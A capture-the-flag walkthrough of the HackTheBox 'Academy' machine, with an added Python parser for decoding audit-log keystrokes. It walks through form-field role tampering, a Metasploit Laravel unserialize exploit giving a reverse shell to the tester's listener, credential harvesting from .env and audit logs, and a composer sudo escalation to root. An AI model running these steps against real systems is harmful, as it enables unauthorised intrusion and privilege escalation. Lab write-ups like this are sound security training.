A walkthrough of the HackTheBox system “Academy”. From the Shellsharks HackTheBox walkthrough series.

Academy


Reconnaissance

NMAP. Always NMAP.

└─$ sudo nmap -n -sS -sV 10.10.10.215
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-22 21:00 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn

OK. So NMAP is reporting that the host is down. Well, we know the host is there, so… Let’s try the -Pn flag…

└─$ sudo nmap -n -sS -sV 10.10.10.215 -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-22 21:00 EST
Nmap scan report for 10.10.10.215
Host is up (0.098s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

There we go. Ok, so ports 22 and 80 appear to be listening. I add “10.10.10.215 academy.htb” to /etc/hosts and then head off to the web server… After registering a user and poking around for a bit, I don’t see anything too interesting. Taking a closer look at the registration (/register.php) page source however I see a hidden form field for “roleid”. Let’s take a closer look at this.

<td align="right"><input class="input" size="40" type="password" id="confirm" name="confirm" /></td>
                </tr>
                <input type="hidden" value="0" name="roleid" />
            </table>
            <br/><br/>

Firing up burp, configuring the proxy settings in Firefox and toggling the intercept, I submit a new registration request and change the roleid to “1” instead of “0”. After this, I attempt logging in with this user and… nothing. At first brush, this doesn’t seem to add much functionality. So back to enumeration…

…after some time… Fire up dirb!

dirb was able to find a /admin.php resource.

┌──(kali㉿kali)-[/usr/share/wordlists/dirb]
└─$ dirb http://academy.htb common.txt

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri Jan 22 22:05:45 2021
URL_BASE: http://academy.htb/
WORDLIST_FILES: common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://academy.htb/ ----
+ http://academy.htb/admin.php (CODE:200|SIZE:2633)  

Foothold

Alright, so now on this admin.php login page, I use the account I just created, which gets me into the “admin” section of the site. Here on this page I see a reference to a “dev-staging-01.academy.htb”. Nice - we’ve got some additional application surface.

<td>Fix issue with dev-staging-01.academy.htb</td>
<td>pending</td>

I add this to my /etc/hosts and whisk myself to this new subdomain. This page shows a bunch of strange-looking exception logs. Included in the presented log is a bunch of environment variables. Notably, I find a variable with the value “Laravel” and a base64-encoded “APP_KEY” value.

Environment Variables
APP_NAME 	"Laravel"
...
APP_KEY 	"base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="

A little Google-hunting and sure enough, there’s a Metasploit module which seems like it could be relevant! I fire up msf and search for “laravel”. I find the module “unix/http/laravel_token_unserialize_exec”. I set the options of the module as shown below…

  • set APP_KEY to the base64 encoded key you found in the log.
  • set RHOSTS to 10.10.10.215.
  • set VHOST to dev-staging-01.academy.htb.
  • set LHOST to your host.

A li’l exploit -j

msf6 exploit(unix/http/laravel_token_unserialize_exec) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/http/laravel_token_unserialize_exec) >
[*] Started reverse TCP handler on 10.10.14.17:4444
[*] Command shell session 1 opened (10.10.14.17:4444 -> 10.10.10.215:39562) at 2021-01-22 22:17:03 -0500

Got me a shell session. Let’s drop in…

msf6 exploit(unix/http/laravel_token_unserialize_exec) > sessions -i 1
[*] Starting interaction with 1...

hostname
academy
whoami
www-data

Got me a foothold as www-data.

User

First I upgrade muh shell.

python3 -c 'import pty; pty.spawn("/bin/bash")'

Some more research on Laravel reveals that some sensitive information is typically stored in .env files. A little hunting on the system and I find a .env in /var/www/html/academy/ which indeed has some interesting stuff.

DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!

Using these creds for mysql ended up being a no-go, so I tried to use them elsewhere. Taking a look at /etc/passwd I see a bunch of potential users these credentials may possibly work for.

mrb3n:x:1001:1001::/home/mrb3n:/bin/sh
cry0l1t3:x:1002:1002::/home/cry0l1t3:/bin/sh
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
21y4d:x:1003:1003::/home/21y4d:/bin/sh
ch4p:x:1004:1004::/home/ch4p:/bin/sh
g0blin:x:1005:1005::/home/g0blin:/bin/sh

Eventually, I find that the creds do work for user cry0l1t3.

Root

Alright, now as cry0l1t3, let’s do a little Linux privesc enum. LinPEAS is a decent option for this. Grepping through the output of this script for the different user names on the system, I find some interesting results for mrb3n.

1. 08/12/2020 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>
2. 08/12/2020 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>

Alternatively, /var/log/audit/audit.log.3 has some hex-encoded data that can be decoded to find this same password.

type=TTY msg=audit(1597199290.086:83): tty pid=2517 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=7375206D7262336E0A
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
type=TTY msg=audit(1597199304.778:89): tty pid=2526 uid=1001 auid=0 ses=1 major=4 minor=1 comm="sh" data=77686F616D690A
type=TTY msg=audit(1597199308.262:90): tty pid=2526 uid=1001 auid=0 ses=1 major=4 minor=1 comm="sh" data=657869740A
type=TTY msg=audit(1597199317.622:93): tty pid=2517 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=2F62696E2F62617368202D690A
type=TTY msg=audit(1597199443.421:94): tty pid=2606 uid=1002 auid=0 ses=1 major=4 minor=1 comm="nano" data=1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B421B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B421B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B421B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B421B5B337E1B5B337E1B5B337E1B5B337E1B5B337E18790D
type=TTY msg=audit(1597199533.458:95): tty pid=2643 uid=1002 auid=0 ses=1 major=4 minor=1 comm="nano" data=1B5B421B5B411B5B411B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B427F1B5B421B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E1B5B337E18790D
type=TTY msg=audit(1597199575.087:96): tty pid=2686 uid=1002 auid=0 ses=1 major=4 minor=1 comm="nano" data=3618790D
type=TTY msg=audit(1597199606.563:97): tty pid=2537 uid=1002 auid=0 ses=1 major=4 minor=1 comm="bash" data=63611B5B411B5B411B5B417F7F636174206175097C206772657020646174613D0D636174206175097C20637574202D663131202D642220220D1B5B411B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B441B5B431B5B436772657020646174613D207C200D1B5B41203E202F746D702F646174612E7478740D69640D6364202F746D700D6C730D6E616E6F2064090D636174206409207C207878092D72202D700D6D617F7F7F6E616E6F2064090D6361742064617409207C20787864202D7220700D1B5B411B5B442D0D636174202F7661722F6C6F672F61750974097F7F7F7F7F7F6409617564097C206772657020646174613D0D1B5B411B5B411B5B411B5B411B5B411B5B420D1B5B411B5B411B5B410D1B5B411B5B411B5B410D657869747F7F7F7F686973746F72790D657869740D
type=TTY msg=audit(1597199606.567:98): tty pid=2517 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=657869740A
type=TTY msg=audit(1597199610.163:107): tty pid=2709 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=2F62696E2F62617368202D690A
type=TTY msg=audit(1597199616.307:108): tty pid=2712 uid=1002 auid=0 ses=1 major=4 minor=1 comm="bash" data=6973746F72790D686973746F72790D657869740D
type=TTY msg=audit(1597199616.307:109): tty pid=2709 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=657869740A
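As an added example (my code, not part of the walkthrough), here is a small Python parser for these pam_tty_audit records: it decodes the hex data= field, strips the escape sequences that nano and bash line editing produce, and flags records typed at a password prompt such as su, which is exactly how the credential above ended up on disk. The sample records are constructed; only the "su mrb3n" and "whoami" lines mirror those shown, and the password value in the su record is made up.

```python
import re

# Constructed sample in the format of the audit.log TTY records above: the
# "su mrb3n" and "whoami" lines mirror the walkthrough, the password typed
# into su ("hunter2") and the nano keystrokes are made up.
SAMPLE_LOG = """\
type=TTY msg=audit(1597199290.086:83): tty pid=2517 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=7375206D7262336E0A
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=68756E746572320A
type=TTY msg=audit(1597199304.778:89): tty pid=2526 uid=1001 auid=0 ses=1 major=4 minor=1 comm="sh" data=77686F616D690A
type=TTY msg=audit(1597199443.421:94): tty pid=2606 uid=1002 auid=0 ses=1 major=4 minor=1 comm="nano" data=1B5B337E1B5B337E18790D
type=TTY msg=audit(1597199606.567:98): tty pid=2517 uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=657869740A
"""

TTY_RE = re.compile(r'type=TTY msg=audit\(\d+\.\d+:(?P<serial>\d+)\): .*?pid=(?P<pid>\d+) '
                    r'uid=(?P<uid>\d+) .*?comm="(?P<comm>[^"]*)" data=(?P<data>[0-9A-Fa-f]+)')
# ANSI CSI sequences (arrow keys, Delete, ...) that nano and bash line editing emit.
CSI_RE = re.compile(r'\x1b\[[0-?]*[ -/]*[@-~]')
# Programs that read a secret from the tty. With pam_tty_audit's log_passwd
# option on, whatever is typed at their prompt is written to the log in the clear.
CREDENTIAL_PROMPTS = {"su", "sudo", "passwd", "ssh", "mysql"}

def decode_keystrokes(hexdata: str) -> str:
    """Hex data= field -> readable text: drop escape sequences, fold CR/LF to
    newline and show remaining control bytes as <C-x> style tokens."""
    out = []
    for ch in CSI_RE.sub("", bytes.fromhex(hexdata).decode("latin-1")):
        if ch in "\r\n":
            out.append("\n")
        elif ord(ch) < 0x20 or ch == "\x7f":  # Ctrl-X becomes <C-x>, DEL becomes <C-?>
            out.append("<C-%s>" % chr((ord(ch) + 0x40) & 0x7f).lower())
        else:
            out.append(ch)
    return "".join(out)

def parse_tty_records(log_text: str) -> list:
    """Every type=TTY line -> dict with serial, pid, uid, comm and decoded keystrokes."""
    records = []
    for line in log_text.splitlines():
        m = TTY_RE.match(line)
        if m:
            rec = {k: int(m[k]) for k in ("serial", "pid", "uid")}
            rec.update(comm=m["comm"], keystrokes=decode_keystrokes(m["data"]))
            records.append(rec)
    return records

def find_captured_secrets(records: list) -> list:
    """Records typed at a password prompt: each one means the audit log itself
    holds a plaintext credential, so the log needs protecting and the credential rotating."""
    return [r for r in records if r["comm"] in CREDENTIAL_PROMPTS]
```

Run it over a real audit.log and every record it returns from find_captured_secrets is a password sitting in a file that is often readable by more people than the credential should be.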

Using those creds I can now log in as mrb3n. Running sudo -l as this new user, I see a binary I can run as super user.

$ sudo -l
sudo -l
[sudo] password for mrb3n: mrb3n_Ac@d3my!

Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer

Throwing this into Google I see a nice little GTFOBin. Let’s try it out.

$ TF=$(mktemp -d)
TF=$(mktemp -d)
$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
$ sudo composer --working-dir=$TF run-script x
sudo composer --working-dir=$TF run-script x
[sudo] password for mrb3n: mrb3n_Ac@d3my!

PHP Warning:  PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning:  PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> /bin/sh -i 0<&3 1>&3 2>&3
# whoami
whoami
root

YAY! Root.